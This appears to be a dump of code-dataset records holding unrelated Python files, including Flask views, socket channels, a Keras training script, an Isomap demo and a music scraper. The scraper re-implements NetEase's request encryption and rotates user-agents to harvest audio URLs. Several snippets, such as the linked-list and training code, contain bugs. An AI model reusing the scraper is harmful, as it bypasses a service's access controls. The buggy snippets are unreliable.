is_logged_in=is_logged_in)\n\n\n@user_blueprint.route('/profile', methods=['GET', 'POST'])\n@requires_login\ndef profile():\n is_logged_in = False if not session.get('email') else True\n if request.method == 'POST':\n uname = request.form['uname']\n api_key = request.form['key']\n return render_template(\"users/profile.html\", uname=uname, api_key=api_key, is_logged_in=is_logged_in)\n\n return render_template(\"users/login.html\", is_logged_in=is_logged_in)\n\n\n@user_blueprint.route('/logout')\n@requires_login\ndef logout():\n session.pop('email')\n return render_template(\"home.html\", is_logged_in=False)\n","sub_path":"views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"60130977","text":"import socket\nfrom application.channel import (Channel, BaseChannel, SenderChannel,\n ReceiverChannel)\nfrom application.message import Message\n\n\nclass BaseSChannel(BaseChannel):\n def __init__(self,\n endpoint: str=None,\n url: str=None):\n\n super(BaseSChannel, self).__init__(endpoint, url)\n\n if self.scheme != 'tcp':\n raise ValueError('Wrong scheme definition')\n\n\nclass SSenderChannel(BaseSChannel, SenderChannel):\n\n def __init__(self,\n endpoint: str=None,\n url: str=None):\n\n super(SSenderChannel, self).__init__(endpoint, url)\n\n # create a socket\n self._connector = socket.socket(socket.AF_INET,\n socket.SOCK_STREAM)\n # connect\n self._connector.connect((self._hostname, self._port))\n\n def send(self, message: Message):\n self._connector.send(message.body.encode())\n\n def close(self):\n self._connector.close()\n\n\nclass SReceiverChannel(BaseSChannel, ReceiverChannel):\n\n MAX_CONNECTIONS = 10\n BUFFER_SIZE = 1024\n\n def __init__(self,\n endpoint: str=None,\n url: str=None):\n\n super(SReceiverChannel, self).__init__(endpoint, url)\n\n # create a socket\n self._connector = socket.socket(socket.AF_INET,\n socket.SOCK_STREAM)\n # bind socket\n self._connector.bind((self._hostname, self._port))\n print('bind: {} {}'.format(self._hostname, self._port))\n # start listening\n self._connector.listen(self.MAX_CONNECTIONS)\n\n def receive(self) -> Message:\n\n # accept connection\n conn, addr = self._connector.accept()\n print('Connected with {} {}\\n'.format(addr[0], str(addr[1])))\n # get message from sender\n data = conn.recv(self.BUFFER_SIZE).decode()\n conn.close()\n\n if data:\n return Message(data)\n else:\n return None\n\n def close(self):\n self._connector.close()\n\nclass SChannel(Channel):\n @classmethod\n def create(cls, endpoint: str, url: str) -> BaseSChannel:\n if endpoint == cls.SENDER:\n return SSenderChannel(endpoint=endpoint, url=url)\n if endpoint == cls.RECEIVER:\n return SReceiverChannel(endpoint=endpoint, url=url)\n","sub_path":"technology/msocket/schannel.py","file_name":"schannel.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"264678076","text":"import task_project_schedule as tps\nimport os\nimport re\n\ndef load_tasks(stripped_lines, n_act, n_res):\n tasks = {}\n for activity in range(n_act):\n line_1 = stripped_lines[activity+1]\n line_2 = stripped_lines[n_act+activity+1]\n task_id = int(line_1[0])\n n_succ = int(line_1[2]) #number of successors\n succ_ids = []\n if n_succ > 0:\n for i in range(n_succ):\n succ_ids.append(int(line_1[3+i]))\n w = int(line_2[3]) #principle work-content\n u_lower, u_upper = [], []\n for r in range(n_res):\n u_lower.append(int(line_2[4+2*r]))\n u_upper.append(int(line_2[4+2*r+1]))\n task = tps.Task(task_id, w, u_lower[0], u_upper[0], succ_ids)\n tasks[task_id] = task\n return tasks\n\ndef load_project(project_file_path):\n f = open(project_file_path, 'r')\n raw_lines = f.read().splitlines()\n stripped_lines = []\n for line in raw_lines:\n stripped_lines.append(re.split('\\t', line))\n first_line = stripped_lines[0]\n n_act = int(first_line[0])+2 #total number of activities incl. dummies\n n_res = int(first_line[1])\n last_line = stripped_lines[2*n_act + 1]\n b = [] #resource availabilities\n for r in range(n_res):\n b.append(int(last_line[r]))\n l = int(last_line[n_res]) #min. block length\n tasks = load_tasks(stripped_lines, n_act, n_res)\n project = tps.Project(project_file_path, tasks, b[0], l)\n return project\n\nproject_file_path = \"test_instance.sch\"\n\nproject = load_project(project_file_path)\n\nschedules = project.get_heuristic_schedules()\nprint(\"schedule makespans: \", [schedule.makespan for schedule in schedules])\nbest_schedule = schedules[0]\nprint(\"l: \", project.l)\nprint(\"w: \", project.R_max)\nprint(\"resource_availability: \", best_schedule.resource_availability)\nprint(\"task_resource_usages: \", best_schedule.task_resource_usage)\nprint(\"optimal makespan: \", max(best_schedule.resource_availability.keys()))\nprint(\"optimal activity list representation: \", [task.id for task in best_schedule.alr.values()])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"212452894","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport logging\n\nfrom flask import Flask, redirect, url_for\nfrom flask_bootstrap import Bootstrap\n\napp = Flask(__name__)\nBootstrap(app)\n\n################################################################################\n### Override with specific settings based on the FLASK_ENV env var\n################################################################################\n\nif \"FLASK_ENV\" in os.environ:\n if os.environ[\"FLASK_ENV\"] == 'prod':\n app.config.from_object('app.config.config.ProductionConfig')\nelse:\n app.config.from_object('app.config.config.DevelopmentConfig')\n\n################################################################################\n### Extra Jinja Filters\n################################################################################\n\n@app.template_filter()\ndef display_beer_icon_filter(value):\n escaped_beer_name = value.lower().replace(\" \", \"_\")\n\n if os.path.isfile(\"%s/static/img/beers/%s.png\" %(app.config['BASE_DIR'], escaped_beer_name)):\n return url_for('static', filename=\"img/beers/%s.png\" %(escaped_beer_name))\n else:\n return url_for('static', filename='img/beers/unknown.png')\n\napp.jinja_env.filters['display_beer_icon'] = display_beer_icon_filter\n\n################################################################################\n### Elasticsearch Setup\n################################################################################\n\nfrom elasticsearch import Elasticsearch\n\nes = Elasticsearch(\"%s:%s\" %(app.config['ELASTICSEARCH_DNS'],\n app.config['ELASTICSEARCH_PORT']))\n\n################################################################################\n# Blueprints registration\n################################################################################\n\nfrom app.home.controllers import home\nfrom app.heartbeat.controllers import heartbeat\n\napp.register_blueprint(home)\napp.register_blueprint(heartbeat)\n\n@app.route('/', methods=['GET'])\n# @app.errorhandler(404)\ndef index(error=None):\n return redirect(url_for('home.display'))","sub_path":"webapp/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"571738045","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\nclass Slist:\n #count = 1\n def __init__(self):\n self.head = None\n\n def addfront(self, val):\n nn = Node(val)\n nn.next = self.head\n self.head = nn\n\n\n def kthElemFromTheEnd(self,k):\n runner = self.head\n temp = self.head\n count = 1\n if k <= 0:\n return self\n\n while (count <= k and runner != None): \n runner = runner.next\n print(\"count:\", count, \"runner.value=\")\n if count == k:\n temp = runner\n print(\"in w\",temp.value)\n count = 1\n temp = temp.next\n count += 1\n print(\"k after func:\", temp.value)\n return temp.value\n\n\n\n\n\n def removeNthFromEnd(self, n):\n length, count, temp = 1, 1, self.head\n\n while temp.next:\n length, temp = length + 1, temp.next\n temp = self.head\n\n if length == n: return self.head.next\n\n while count < length - n:\n count, temp = count + 1, temp.next\n temp.next = temp.next.next\n print(temp.next.value)\n return self\n\n def kthwith2whileloops(self, k):\n runner = self.head\n count = 1\n\n while count < k:\n runner2 = runner.next\n count += 1\n\n while runner2.next:\n runner = runner.next\n runner2 = runner2.next\n \n return runner.val\n\n\n\n def printlist(self):\n runner = self.head\n while(runner):\n print(runner.value, end = \" \")\n runner = runner.next\n\nmylist = Slist()\nmylist.addfront(6)\nmylist.addfront(5)\nmylist.addfront(4)\nmylist.addfront(3)\nmylist.addfront(2)\nmylist.addfront(1)\n\nmylist.printlist()\nk=2\nprint(f\"the k={k} The kth element is:\")\n#mylist.kthElemFromTheEnd(k)\nmylist.kthwith2whileloops(1)\n\n#mylist.removeNthFromEnd(2)\n\nmylist.printlist()\n","sub_path":"python/data_structures/kthelementformtheend.py","file_name":"kthelementformtheend.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"290098981","text":"#! /usr/bin/env python\n\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.optimizers import SGD, RMSprop\nfrom keras.regularizers import l1, l2, l1_l2\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport argparse, tarfile, os, tempfile, shutil, json\n\nfrom keras import backend as K\n\ndef create_model():\n with open('hyperparameters.json', 'r') as f:\n spec = json.load(f)\n\n model = Sequential()\n\n layer = spec['layers']\n units = layer.pop('units')\n dropout = layer.pop('dropout', None)\n next = layer.pop('next', None)\n\n print(layer)\n model.add(Dense(units, input_shape=(3,), **layer))\n if dropout is not None and 'rate' in dropout:\n model.add(Dropout(dropout['rate']))\n\n layer = next\n\n while layer is not None:\n print(layer)\n units = layer.pop('units')\n dropout = layer.pop('dropout')\n next = layer.pop('next', None)\n model.add(Dense(\n units,\n input_shape=(units,),\n **layer\n ))\n\n if dropout is not None and 'rate' in dropout:\n model.add(Dropout(dropout['rate']))\n\n layer = next\n\n model.add(Dense(1, activation='sigmoid'))\n\n opt = spec.pop('optimizer')\n if opt == 'sgd':\n opt = SGD(lr=spec['lr'])\n elif opt == 'rmsprop':\n opt = RMSProp(lr=spec['lr'])\n \n model.compile(\n optimizer=opt,\n loss=spec['loss'],\n metrics=[accuracy]\n )\n\n return model\n\n\ndef accuracy(y_true, y_pred):\n correct = K.equal(y_true - y_pred, K.zeros_like(y_true, dtype='float32'))\n n = K.sum(K.cast(correct, 'float32'))\n t = K.sum(K.ones_like(y_true, dtype='float32'))\n return n / t\n\n\ndef write_output(loss, acc):\n with open('performance.json', 'w') as f:\n json.dump({'loss': loss ,'acc': acc}, f)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Train ANN auto-encoder.')\n parser.add_argument('infile',\n help='File name for reading events.')\n\n parser.add_argument('-o','--out', dest='outbase', metavar='OUTBASE',\n default='model',\n help='File name base (no extension) ' +\n 'for saving model structure and weights (two separate ' +\n 'files).')\n\n parser.add_argument('-N','--num-epochs',\n default=10, type=int,\n help='Number of epochs')\n\n parser.add_argument('-b','--batch-size',\n default=256, type=int,\n help='Minibatch size')\n\n parser.add_argument('-l','--layer', dest='layers',\n metavar = 'NH', action='append',\n type=int,\n help='Specify a layer with %(metavar)s hidden layers. ' +\n 'Multiple layers can be specified')\n\n parser.add_argument('--reg-type', choices = ['l1','l2','l1_l2'],\n help='Type of regularization to apply')\n\n parser.add_argument('--reg-penalty',type=float, default=0.001,\n help='Regularization penalty')\n\n def restricted_float(x):\n x = float(x)\n if x < 0.0 or x > 1.0:\n raise argparse.ArgumentTypeError(\"%r not in range [0.0, 1.0]\"%(x,))\n return x\n\n parser.add_argument('--train-fraction',type=restricted_float,\n default = 0.9,\n help='Fraction (between 0. and 1.) of the examples in '+\n 'the input file to use for training. The rest is used '+\n 'for testing.')\n\n args = parser.parse_args()\n\n # Keep track of all the output files generate so they can be\n # stuffed into a tar file. (Yes, a tarfile. I'm old, OK?)\n outFileList = []\n tmpDirName = tempfile.mkdtemp()\n\n # Load the data\n npfile = np.load(args.infile)\n\n inputs = npfile['inputs']\n outputs = npfile['outputs']\n\n # Standardize the input so that it has mean 0 and std dev. of 1. This helps\n # tremendously with training performance.\n # inputMeans = inputs[0:int(inputs.shape[0]*args.train_fraction),:].mean(axis=0)\n # inputStdDevs = inputs[0:int(inputs.shape[0]*args.train_fraction),:].std(axis=0)\n # inputs = (inputs-inputMeans)/inputStdDevs\n # outputMeans = outputs[0:int(outputs.shape[0]*args.train_fraction)].mean(axis=0)\n # outputStdDevs = outputs[0:int(outputs.shape[0]*args.train_fraction)].std(axis=0)\n # outputs = (outputs-outputMeans)/outputStdDevs\n\n inputMeans = inputs.mean(axis=0)\n inputStdDevs = inputs.std(axis=0)\n inputs = (inputs-inputMeans)/inputStdDevs\n outputMeans = outputs.mean(axis=0)\n outputStdDevs = outputs.std(axis=0)\n outputs = (outputs-outputMeans)/outputStdDevs\n\n npFileName = 'std.npz'\n outFileList.append(npFileName)\n np.savez_compressed(os.path.join(tmpDirName,npFileName),\n inputMeans=inputMeans,\n inputStdDevs=inputStdDevs,\n outputMeans=outputMeans,\n outputStdDevs=outputStdDevs)\n\n if False:\n # Initialize the appropriate regularizer (if any)\n reg = None\n if args.reg_type == \"l1\":\n reg = l1(args.reg_penalty)\n elif args.reg_type == \"l2\":\n reg = l1(args.reg_penalty)\n elif args.reg_type == \"l1_l2\":\n reg = l1_l2(args.reg_penalty)\n\n # Check the requested layers. If none, make the simplest\n # possible: 1 layer with number of nodes equal to the size of the\n # input.\n if hasattr(args,'layers') and args.layers != None:\n layers = args.layers\n else:\n layers = [inputs.shape[1]]\n\n\n # Build a model\n model = Sequential()\n #print layers\n # First layer\n model.add(Dense(1,input_dim=3))\n model.add(Activation('linear'))\n\n model.compile(loss='mse',\n optimizer='adam')\n\n model = create_model()\n train_split = int(inputs.shape[0] * args.train_fraction)\n model.fit(\n inputs[0:train_split],\n outputs[0:train_split],\n batch_size=256,\n epochs=100\n )\n\n loss = model.evaluate(inputs[train_split:], outputs[train_split:], batch_size=256)\n write_output(loss, 0)\n j = model.to_json()\n with open('model.json', 'w') as f:\n json.dump(j, f)\n model.save_weights('weights.h5')\n # Add callbacks\n # filepath = 'model.h5'\n # outFileList.append(filepath)\n # checkpoint = ModelCheckpoint(os.path.join(tmpDirName,filepath), monitor = 'val_loss', mode = 'min', save_best_only = True)\n # model.summary()\n\n # hist = model.fit(inputs, outputs, validation_split=(1-args.train_fraction),\n # epochs=args.num_epochs, batch_size=args.batch_size, verbose=2, callbacks=[checkpoint])\n\n # print 'Tarring outfiles...'\n # outfile_name = '{}_N{}_b{}_l{}_frac{:f}'.format(args.outbase,\n # args.num_epochs,\n # args.batch_size,\n # '_'.join([str(l) for l in layers]),\n # args.train_fraction)\n # if hasattr(args,'reg_type') and args.reg_type != None:\n # outfile_name += ('{}{:f}'.format(args.reg_type,args.reg_penalty))\n #\n # outfile_name += '.tgz'\n #\n # with tarfile.open(outfile_name,'w:gz') as tar:\n # for f in outFileList:\n # tar.add(os.path.join(tmpDirName,f),f)\n #\n # shutil.rmtree(tmpDirName)\n #\n # print 'Done.'\n","sub_path":"v_to_sum/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"252836040","text":"#####################################################################\n#\n# ISOMAP (Isometric Feature Mapping) analysis example on Swiss Roll data.\n# =======================================================================\n#\n# DATASET URL: http://isomap.stanford.edu/datasets.html\n# ------------\n#\n# The following files are used to run the analysis here:\n#\n# swiss_roll_data.mat: Data coordinates are contained in X_data and Y_data\n# variables\n# --------------------------------------\n# The codes are based on Python2.7. \n# Please install numpy, scipy, matplotlib packages before using.\n# Update the matplotlib package to the newest edition to enable 3-D plot\n# Thank you for your suggestions!\n#\n# @version 1.0\n# --------------------------------------\n#####################################################################\nimport scipy.io as sio \nimport numpy as np\nfrom scipy.sparse import csc_matrix, csgraph\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \n\nmatFile = sio.loadmat('swiss_roll_data.mat')\n\nx = matFile['X_data']\nx = np.array(x)\nx = x[:, np.arange(0, x.shape[1], 10)]\n\ny = matFile['Y_data']\ny = np.array(y)\ny = y[:, np.arange(0, y.shape[1], 10)]\n\n# number of data points to work with \nm = x.shape[1]\n\n# Plot 3D scatter of the original data points. Rotate the figure using the\n# rotate 3D button in the above panel for figure window to see the 3D swiss\n# roll.\nplt.figure(1)\nplt.ion()\nax = Axes3D(plt.gcf())\nax.scatter(x[0,:], x[1,:], x[2,:], s = 18 * np.ones((1, m)), c = y[0,:])\nplt.show()\nplt.ioff()\n\nraw_input('press any key to continue\\n')\n\n## Step 1: Create neigborhood graph \n# Find neighbors of each data point within distance epsilon (e).\n# G is the adjacency matrix recording neighbor Euclidean distance \nG1 = np.sum(np.power(x,2),axis = 0).T.reshape(m,1)\nG1 = G1.dot(np.ones((1,m)))\nG2 = np.sum(np.power(x,2),axis = 0).reshape(1,m)\nG2 = np.ones((m, 1)).dot(G2)\nG3 = 2 * x.T.dot(x)\nG = G1 + G2 - G3\nG[G < 0] = 0\nG = np.sqrt(G)\n\ne = 0.2 * np.median(G)\nG[G > e] = 0\n\n# Get rid of effectively Infinite distance for simplicity\nsG = np.sum(G, axis = 0)\nidx = np.where(sG != 0)[0]\n\nG = G[idx,:][:,idx]\nm = G.shape[0]\n\n## Step 2: Using all pair shortest path algorithm, construct graph distance\n# matrix \nD = csgraph.shortest_path(csc_matrix(G))\nD2 = np.power(D, 2) # Using square for inner product\nH = np.eye(m) - np.ones((m,1)).dot(np.ones((1,m)))/m # Construct special centring matrix H\nDt = -0.5 * H.dot(D2) # Apply H to both sides of D2\nDt = Dt.dot(H)\n\n## Step 3: Low dim. representation that preserves distance information\nk = 10\nV, S, U = np.linalg.svd(Dt) # computes the k largest singular values and \n # associated singular vectors of distance matrix\n\n\n# Use the eigenvectors corresponding to the largest eigenvalue as 1st\n# coordinate and second larges eignevalue as 2nd coordinate\ndim1_new = V[:,0] * np.sqrt(S[0])\ndim2_new = V[:,1] * np.sqrt(S[1])\n\n# Plot scatter of the swiss roll dataset in reudced dimensions after isomap\n# analysis.\nplt.figure(2)\nplt.ion()\nplt.scatter(-dim1_new, -dim2_new, s= 18 * np.ones((1, 698)), c = y[1,:])\nplt.show()\nplt.ioff()\nplt.show()","sub_path":"Isomap/swiss_roll/test_isomap2.py","file_name":"test_isomap2.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"215996742","text":"# -*- coding: utf-8 -*-\n__author__ = \"dzt\"\n__date__ = \"2018/12/10 11:49\"\n\n\nimport requests\nimport os, json, base64\nfrom scrapy.selector import Selector\nfrom binascii import hexlify\nfrom Crypto.Cipher import AES\nimport random\nimport xlwt\nimport xlrd\n\nsep = '\\n'\nsep1 = '*'*50 + '\\n'\nsep2 = '\\n' + '*'*50 + '\\n\\n'\n\n# url = 'https://www.ximalaya.com/youshengshu/4202564/'\nAgent = [\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 \",\n \"Mozilla/5.0 \"\n \"(Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14\",\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n \"Mozilla/5.0 \"\n \"(Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\",\n 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',\n 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; '\n 'MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); '\n '.NET CLR 2.0.50727; InfoPath.1)',\n 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; '\n 'FunWebProducts)',\n 'Mozilla/5.0 (X11; U; UNICOS lcLinux; en-US) Gecko/20140730 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',\n 'Mozilla/5.0 (X11; U; Linux; pt-PT) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.4'\n ]\n\n\nclass Encrypyed():\n '''传入歌曲的ID,加密生成'params'、'encSecKey 返回'''\n def __init__(self):\n self.pub_key = '010001'\n self.modulus = '00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7'\n self.nonce = '0CoJUm6Qyw8W8jud'\n\n def create_secret_key(self, size):\n return hexlify(os.urandom(size))[:16].decode('utf-8')\n\n def aes_encrypt(self, text, key):\n iv = '0102030405060708'\n pad = 16 - len(text) % 16\n text = text + pad * chr(pad)\n encryptor = AES.new(key, AES.MODE_CBC, iv)\n result = encryptor.encrypt(text)\n result_str = base64.b64encode(result).decode('utf-8')\n return result_str\n\n def rsa_encrpt(self, text, pubKey, modulus):\n text = text[::-1]\n rs = pow(int(hexlify(text.encode('utf-8')), 16), int(pubKey, 16), int(modulus, 16))\n return format(rs, 'x').zfill(256)\n\n def work(self, text):\n text = json.dumps(text)\n i = self.create_secret_key(16)\n encText = self.aes_encrypt(text, self.nonce)\n encText = self.aes_encrypt(encText, i)\n encSecKey = self.rsa_encrpt(i, self.pub_key, self.modulus)\n data = {'params': encText, 'encSecKey': encSecKey}\n # print(data)\n return data\n\n\nclass wangyiyun():\n def __init__(self):\n self.headers = {\n 'User-Agent': random.choice(Agent),\n 'Referer': 'http://music.163.com/'}\n self.main_url = 'http://music.163.com/'\n self.session = requests.Session()\n self.session.headers = self.headers\n self.ep = Encrypyed()\n\n def get_songurls(self, playlist):\n '''进入所选歌单页面,得出歌单里每首歌各自的ID 形式就是“song?id=64006\"'''\n url = self.main_url+'playlist?id=%d' % playlist\n re = self.session.get(url) #直接用session进入网页,懒得构造了\n sel = Selector(text=re.text) #用scrapy的Selector,懒得用BS4了\n songurls = sel.xpath('//ul[@class=\"f-hide\"]/li/a/@href').extract()\n return songurls #所有歌曲组成的list\n ##['/song?id=64006', '/song?id=63959', '/song?id=25642714', '/song?id=63914', '/song?id=4878122', '/song?id=63650']\n\n def get_songinfo(self, songurl):\n '''根据songid进入每首歌信息的网址,得到歌曲的信息\n return:'64006','陈小春-失恋王'''\n url = self.main_url+songurl\n re = self.session.get(url)\n sel = Selector(text=re.text)\n song_id = url.split('=')[1]\n songname = sel.xpath(\"//em[@class='f-ff2']/text()\").extract_first()\n singer = '&'.join(sel.xpath(\"//p[@class='des s-fc4']/span/a/text()\").extract())\n # songname = singer+'-'+song_name\n return str(song_id), songname, singer\n\n def get_url(self, ids, br=128000):\n '''self.ep.work输入歌曲ID,解码后返回data,{params 'encSecKey}\n 然后post,得出歌曲所在url'''\n text = {'ids': [ids], 'br': br, 'csrf_token': ''}\n data = self.ep.work(text)\n url = 'http://music.163.com/weapi/song/enhance/player/url?csrf_token='\n req = self.session.post(url, data=data)\n song_url = req.json()['data'][0]['url']\n return song_url\n\n def url_song(self, songurl, dir_path):\n '''根据歌曲url,获取mp3地址'''\n song_id, songname, singer = self.get_songinfo(songurl) # 根据歌曲url得出ID、歌名、歌手名\n song_url = self.get_url(song_id) # 根据ID得到歌曲的实质URL\n print(songname)\n print(song_url)\n return songname, song_url, singer\n\n\n def work(self, playlist):\n songurls = self.get_songurls(playlist) # 输入歌单编号,得到歌单所有歌曲的url\n dir_path = r''\n f = xlwt.Workbook()\n sheet1 = f.add_sheet(u'表1', cell_overwrite_ok=True)\n for songurl in songurls:\n a = songurls.index(songurl)\n songname, song_url, singer = self.url_song(songurl, dir_path)\n if song_url is None:\n continue\n sheet1.write(a, 0, songname) # 作品名称\n sheet1.write(a, 1, 12) # 分类\n sheet1.write(a, 2, song_url) # 资源url\n sheet1.write(a, 3, 1) # 初始年龄\n sheet1.write(a, 4, 99) # 结束年龄\n sheet1.write(a, 5, 1) # 语言范围\n sheet1.write(a, 6, '') # 作品简介\n sheet1.write(a, 7, singer) # 表演者/主播\n sheet1.write(a, 8, '') # 作者/作词者\n sheet1.write(a, 9, '') # 主角\n sheet1.write(a, 10, '') # 作曲者\n sheet1.write(a, 11, '') # 主要情节\n sheet1.write(a, 12, '') # 封面url\n a += 1\n new_imei_file = '%s.xls' % playlist\n f.save(new_imei_file)\n\nif __name__ == '__main__':\n d = wangyiyun()\n d.work(2204388891)\n\n","sub_path":"wangyiyun_mp3.py","file_name":"wangyiyun_mp3.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"430598093","text":"#!/usr/bin/python3\n\nimport re\n\n\nPROPERTIES = ['children', 'cats', 'samoyeds', 'pomeranians', 'akitas', 'vizslas', 'goldfish', 'trees', 'cars', 'perfumes']\n\nFILTER = {\n \"children\": 3,\n \"cats\": 7,\n \"samoyeds\": 2,\n \"pomeranians\": 3,\n \"akitas\": 0,\n \"vizslas\": 0,\n \"goldfish\": 5,\n \"trees\": 3,\n \"cars\": 2,\n \"perfumes\": 1\n}\n\naunts = []\n\nwith open('input') as f:\n for line in f:\n line = line.strip()\n m = re.match('Sue (?P\\d+):', line)\n number = m.group('number')\n \n sue = { 'number': number }\n for m in re.finditer('(?P